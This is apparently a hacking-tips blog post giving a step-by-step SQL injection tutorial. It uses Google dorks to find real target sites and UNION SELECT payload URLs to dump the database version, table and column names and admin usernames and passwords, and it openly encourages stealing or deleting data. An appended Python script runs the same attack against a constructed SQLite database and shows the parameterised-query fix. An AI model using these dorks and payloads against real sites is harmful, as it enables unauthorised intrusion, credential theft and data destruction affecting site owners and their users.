#2.1 : Hacking Tips
SQL Injection Tutorial with Example English
SQL injection is one of the most popular methods of hacking a web application. It exploits a flaw in how the site builds its database queries, so that an attacker can reach the database behind the site and read, insert or delete its data.
That means credit card numbers and passwords can be stolen and a site can be defaced. I'm going to explain the whole process in detail.
==========================================================
1. Finding a Vulnerable Website
First of all you need to find a vulnerable site. You can use Google dorks to get a list of sites that are likely to be injectable. A vulnerable site has some flaw in how it handles its URL parameters which a hacker can exploit; you can also search for ready-made lists by typing "List of SQL vulnerable site" into Google. You won't have much difficulty finding candidates: simply type the keywords below into the Google search box.
Examples -
inurl:index.php?id=
inurl:article.php?id=
inurl:page.php?id=
There are other keywords you can use; I've mentioned only a few. Any Google dork will return numerous results, but not all of them are vulnerable, and a published "list of vulnerable sites" is no guarantee either. Once you have candidates from the first step, move on to the second.
-------------------------------------------------------------------------------
2. Checking the Vulnerability
Now you've found websites matching the above keywords, or a list of supposedly vulnerable websites. You have to check whether each one really is vulnerable. This step determines whether the site can be hacked at all, and it is done with a single apostrophe. Let's assume we have found the site http://www.example.com/index.php?id=2 . Add an apostrophe (') at the end of the URL and hit enter.
Example -
http://www.example.com/index.php?id=2'
If you get a database error message, the apostrophe broke the query and the site is vulnerable. If the page loads normally or shows 'page not found', the site is probably not vulnerable in this simple way (a site can still be injectable while hiding its error messages, but that "blind" case needs other techniques than this tutorial covers). If the site is vulnerable you should get an error message like this.
Example -
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\" at line 1."
Congratulations if you've got that message! If the current URL isn't vulnerable, find a new one.
-------------------------------------------------------------------------------
3. Finding the Number of Columns
So you've found a vulnerable website; now it's time to find the number of columns in the query. Replace the apostrophe (') with an "order by 1" clause and keep increasing the number to 2, 3, 4 ... n until you get an error such as "Unknown column '9' in 'order clause'".
Example -
http://www.example.com/index.php?id=2 order by 1
No error
http://www.example.com/index.php?id=2 order by 2
No error
http://www.example.com/index.php?id=2 order by 3
No error
http://www.example.com/index.php?id=2 order by 9
Error found "Unknown column".
Let's assume we got the error at "order by 9": that means the query selects 8 columns (it is the number of columns in the site's own SELECT statement, not in the whole database).
If the statements above fail, add "--" at the end of the URL so that whatever the site appends to the query is commented out.
Example-
http://www.example.com/index.php?id=2 order by 1--
-------------------------------------------------------------------------------
4. Find Vulnerable Columns
Now we have discovered the number of columns in the query. We will use a "union select" statement to find out the vulnerable columns. Vulnerable columns are the columns whose values the page actually displays, so anything we select into them will be shown on screen. Change the id value to a negative number (-2) so that the site's own query returns no row and only our union row is rendered, and list the numbers 1 to n for the number of columns found.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, 3, 4, 5, 6, 7, 8--
After executing the above statement you will find the vulnerable columns displayed on your screen.
Example -
3 query was empty 7
The above line shows that the numbers 3 and 7 were printed on the page, so columns 3 and 7 are vulnerable and we can inject our expressions into them.
-------------------------------------------------------------------------------
5. Find SQL version, Database, Username
Now we'll retrieve the SQL version, database's name and username.
SQL Version
We'll work in column number 3 and replace it with "version()" to fetch the version of the database. It is important to know the version, because older versions (before MySQL 5, which has no information_schema) need different statements to run the later steps.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, version(), 4, 5, 6, 7, 8--
Press enter and you'll find something like this -
5.0.1 or 4.3.0 (This is SQL version).
Database
We'll now find the database's name.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, database(), 4, 5, 6, 7, 8--
Username
This step will be used to retrieve the database username.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, user(), 4, 5, 6, 7, 8--
-------------------------------------------------------------------------------
6. Getting the Table Name
Now we'll have to find the table names. You could guess a table name such as admin, members etc., but there is a more effective method: ask information_schema for every table in the current database.
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, group_concat(table_name), 4, 5, 6, 7, 8 from information_schema.tables where table_schema=database()--
-------------------------------------------------------------------------------
7. Get Column Name
You'll need one extra step here. Take the table name you got in the previous step and convert it to a CHAR() list of ASCII codes, so that the URL needs no quote characters: for example the table name admin becomes CHAR(97,100,109,105,110). Any ASCII converter will do this, and MySQL also accepts the hex form 0x61646d696e in place of CHAR(...).
Example -
http://www.example.com/index.php?id=-2 union select 1, 2, group_concat(column_name), 4, 5, 6, 7, 8 from information_schema.columns where table_name=CHAR(97,100,109,105,110)--
-------------------------------------------------------------------------------
8. Display Password & Username
Example - (replace admin with the table found in step 6; 0x2a is an asterisk used to separate the two values)
http://www.example.com/index.php?id=-2 union select 1, 2, group_concat(username,0x2a,password), 4, 5, 6, 7, 8 from admin--
Now the usernames and passwords are displayed on your screen, congrats! From here you can steal, modify or delete the information in the database.
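The whole procedure above (steps 2 to 8) replayed in one script, as an added example that is not part of the original post: a miniature index.php?id= handler that glues its parameter into the SQL, the probes from each step run against it, and the parameterised version of the same page that the payloads bounce off. It uses an in-memory SQLite database rather than a live MySQL site, so the table and column names (articles, users, username, password) are constructed for the demo, and where SQLite spells something differently from MySQL (sqlite_version() for version(), sqlite_master for information_schema.tables, pragma_table_info for information_schema.columns, || instead of a multi-argument group_concat) the comment says so.

```python
import re
import sqlite3

# Constructed sample data standing in for the target site's database.
SCHEMA = """
CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT);
INSERT INTO articles VALUES (1, 'Hello', 'First post', 'alice');
INSERT INTO articles VALUES (2, 'News', 'Second post', 'bob');
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret');
INSERT INTO users VALUES (2, 'editor', 'hunter2');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_page(conn, id_param):
    """index.php?id= as the vulnerable site writes it: the parameter is glued
    into the SQL text and database errors are echoed back to the visitor."""
    sql = "SELECT title, body, author FROM articles WHERE id = " + id_param
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.OperationalError as err:
        return f"ERROR: {err}"          # the tell used in step 2
    # Only title and author are rendered; body never reaches the page, so in
    # the tutorial's terms columns 1 and 3 are "vulnerable" and column 2 is not.
    return "".join(f"<h1>{r[0]}</h1><p>by {r[2]}</p>" for r in rows)


def safe_page(conn, id_param):
    """The same page with a bound parameter: the input is data, never SQL."""
    sql = "SELECT title, body, author FROM articles WHERE id = ?"
    rows = conn.execute(sql, (id_param,)).fetchall()
    return "".join(f"<h1>{r[0]}</h1><p>by {r[2]}</p>" for r in rows)


def is_injectable(page):
    """Step 2: a stray apostrophe that produces a database error."""
    return page("2'").startswith("ERROR")


def count_columns(page, max_cols=20):
    """Step 3: raise ORDER BY n until the database rejects it; n-1 columns."""
    for n in range(1, max_cols + 1):
        if page(f"2 order by {n}--").startswith("ERROR"):
            return n - 1
    return None


def reflected_columns(page, ncols):
    """Step 4: UNION SELECT one marker per column; the markers that show up in
    the rendered page are the columns we can read data through."""
    markers = ", ".join(f"'col{i}'" for i in range(1, ncols + 1))
    html = page(f"-2 union select {markers}--")
    return [i for i in range(1, ncols + 1) if f"col{i}" in html]


def extract(page, ncols, col, expr, from_clause=""):
    """Steps 5 to 8: put an expression into a reflected column and read back
    what the page renders for it (column 1 of this page lands inside <h1>)."""
    fields = [f"'x{i}'" for i in range(1, ncols + 1)]
    fields[col - 1] = expr
    html = page(f"-2 union select {', '.join(fields)} {from_clause}--")
    match = re.search(r"<h1>(.*?)</h1>", html, re.S)
    return match.group(1) if match else None


def char_literal(s):
    """Step 7: spell a string as CHAR(...) so the URL needs no quote characters
    (MySQL and SQLite both accept it; MySQL also takes a 0x... hex literal)."""
    return "char(" + ",".join(str(ord(c)) for c in s) + ")"


def run_attack(page):
    """The full procedure against one page function; None if it is not injectable."""
    if not is_injectable(page):
        return None
    ncols = count_columns(page)
    col = reflected_columns(page, ncols)[0]
    return {
        "columns": ncols,
        # version() / database() / user() in MySQL; SQLite only has sqlite_version()
        "version": extract(page, ncols, col, "sqlite_version()"),
        # information_schema.tables where table_schema=database() in MySQL
        "tables": extract(page, ncols, col, "group_concat(name)",
                          "from sqlite_master where type='table'"),
        # information_schema.columns where table_name=CHAR(...) in MySQL
        "user_columns": extract(page, ncols, col, "group_concat(name)",
                                f"from pragma_table_info({char_literal('users')})"),
        # MySQL: group_concat(username,0x2a,password); SQLite joins with ||
        "creds": extract(page, ncols, col,
                         "group_concat(username || char(42) || password)",
                         "from users"),
    }


if __name__ == "__main__":
    conn = make_db()
    print(run_attack(lambda p: vulnerable_page(conn, p)))   # full dump
    print(run_attack(lambda p: safe_page(conn, p)))         # None
```

Against vulnerable_page the script reports three columns, columns 1 and 3 as reflected, and then the version, table list, the users table's column names and every username*password pair; against safe_page the apostrophe probe simply returns an empty page, because a bound parameter is compared as a value and can never change the shape of the query. That one-line difference in how the query is built is the entire fix for everything this tutorial describes.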
-------------------------------------------------------------------------------
My Site : iitboss.com